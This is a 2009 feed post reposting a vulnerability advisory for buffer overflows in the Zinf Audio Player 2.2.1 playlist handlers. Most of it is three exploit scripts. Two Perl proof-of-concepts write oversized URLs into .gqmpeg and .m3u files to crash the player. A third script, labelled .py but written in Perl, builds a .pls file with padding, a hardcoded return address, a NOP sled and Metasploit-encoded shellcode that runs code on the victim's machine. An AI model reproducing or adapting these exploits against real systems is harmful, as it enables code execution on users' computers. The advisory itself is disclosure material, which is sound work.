|
Feeds -
Exploits
|
|
Written by Hakxer
|
|
Wednesday, 25 March 2009 22:41 |
Zinf Multiple Playlist Files Buffer Overflow Vulnerability
-\\Bugtraq ID:
33482
-\\Class:
Boundary Condition Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Jan 27 2009 12:00AM
-\\Updated:
Mar 25 2009 07:56PM
-\\Credit:
Hakxer
-\\Vulnerable:
Zinf Zinf 2.2.1
-\\Discussion
Zinf is prone to a buffer-overflow vulnerability because the application fails to bounds-check
user-supplied data before copying it into an insufficiently sized buffer.
Successfully exploiting this issue allows remote attackers to execute arbitrary machine code
in the context of the affected user. Failed exploit attempts will likely crash the application.
Zinf 2.2.1 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
The following proof-of-concept and exploit examples are available:
===============================================================
33482-gqmpeg.pl
^^^^^^^^^^^^^^^^
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 ( gqmpeg FILE) Buffer Overflow PoC
# Greetz to : Egyptianxhacker,ProViDoR , Br1ght D@rk , Error Code , Kof2002 , Sql_Inj3ct0r ,
# egy coders team , Sec-geeks.com
my $deamoddd="http://"."A" x 70000;
open(MYFILE,'>>hakxer.gqmpeg');
print MYFILE $deamoddd;
close(MYFILE);
print "PoC Created .. Hakxer [sec-geeks.com] EgY Coders Team";
===============================================================
33482-m3u.pl
^^^^^^^^^^^^^
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow
my $chars="http://"."A" x 50000;
open(MYFILE,'>>hakxer.m3u');
print MYFILE $chars;
close(MYFILE);
print " Done";
===============================================================
33482-pls.py
^^^^^^^^^^^^^
#!/usr/bin/perl -w
# Author : Houssamix
# Zinf Audio Player 2.2.1 (PLS File) Universal Local Buffer Overflow exploit
# tested in windows pro Sp 2 (french)
print "===================================================================== \n";
print "Author : Houssamix \n";
print "===================================================================== \n";
print "Zinf Audio Player 2.2.1 Universal Local Buffer Overflow exploit \n";
print "===================================================================== \n";
my $overflow = "\x41" x 1300;
my $ret = "\xC8\x2C\x00\x10"; #0x10002CC8 push esp - ret > universal adress(vorbisfile.dll)
my $nop = "\x90" x 128 ;
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x58".
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x53\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54".
"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43".
"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x58\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x43".
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x36".
"\x4e\x56\x43\x36\x42\x50\x5a";
my $file="hsmx.pls";
$exploit = $overflow.$ret.$nop.$shellcode;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are
aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Zinf Homepage
http://www.zinf.org (Zinf)
|
